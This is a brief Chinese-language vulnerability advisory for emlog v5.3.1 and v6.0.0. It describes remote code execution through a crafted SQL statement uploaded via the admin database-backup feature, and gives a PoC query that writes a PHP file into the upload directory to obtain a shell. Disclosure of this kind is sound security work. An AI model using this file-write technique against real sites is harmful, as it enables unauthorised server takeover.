由于在admin/data.php中上传了数据库备份文件,因此emlog v5.3.1和emlog v6.0.0具有远程执行代码漏洞。
影响版本:
- Emlog v5.3.1
- Emlog v6.0.0
PoC:
select "<?php phpinfo();?>" into outfile "/var/www/html/tet1/emlog_6.0.0/src/content/uploadfile/202104/222.php";
通过在后台数据-备份数据库进行构造恶意sql语句进行备份上传-getshell
ref: